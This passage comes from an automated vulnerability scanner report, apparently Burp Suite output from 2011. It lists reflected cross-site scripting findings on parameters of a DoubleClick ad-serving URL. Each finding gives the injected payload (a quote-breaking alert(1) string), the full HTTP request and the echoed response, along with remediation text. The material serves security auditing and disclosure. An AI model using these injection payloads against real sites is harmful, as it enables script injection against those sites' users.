<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
'http://s0.2mdn.net/1887566/300x250_ps1.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=9795613a0b'-alert(1)-'b4090b2e029&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTPr
...[SNIP]...

1.87. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_et parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48fcb'-alert(1)-'890adbd91c3 was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=130923056948fcb'-alert(1)-'890adbd91c3&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:11:12 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
n.net/1887566/300x250_ps1.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=130923056948fcb'-alert(1)-'890adbd91c3&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%2
...[SNIP]...

1.88. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb7b5'-alert(1)-'a24c9917e30 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607cb7b5'-alert(1)-'a24c9917e30&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:10:30 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
ar dcgif = 'http://s0.2mdn.net/1887566/300x250_ps1.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607cb7b5'-alert(1)-'a24c9917e30&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3
...[SNIP]...

1.89. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_pm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cbc3'-alert(1)-'e281d6b67ee was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=979565cbc3'-alert(1)-'e281d6b67ee&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:12:57 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
= '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=979565cbc3'-alert(1)-'e281d6b67ee&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp%3Dflash%26cm_mmc%3
...[SNIP]...

1.90. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_pn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37287'-alert(1)-'39e905a1df2 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=2186867337287'-alert(1)-'39e905a1df2&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:13:18 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=2186867337287'-alert(1)-'39e905a1df2&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp%3Dflash%26cm_mmc%3Dx1-_-mass-_-
...[SNIP]...

1.91. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9899c'-alert(1)-'b732d4a27f7 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=116839899c'-alert(1)-'b732d4a27f7&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:11:54 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
_ps1.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=116839899c'-alert(1)-'b732d4a27f7&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250
...[SNIP]...

1.92. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 518ed'-alert(1)-'4b93262946f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=518ed'-alert(1)-'4b93262946f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5736
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:13:31 GMT
Expires: Tue, 28 Jun 2011 03:13:31 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=518ed'-alert(1)-'4b93262946fhttp://www.fingerhut.com/user/pre_screen_credit.jsp?CTid=471&CTKey=PS1Reach&CTMedia=x1&CTProgType=mass&CTUnitSize=300x250&CTTestGrp=flash&cm_mmc=x1-_-mass-_-300x250-_-flash';
var target = '_blank';
var
...[SNIP]...

1.93. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e8c0'-alert(1)-'1349c693deb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc9638518e8c0'-alert(1)-'1349c693deb&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
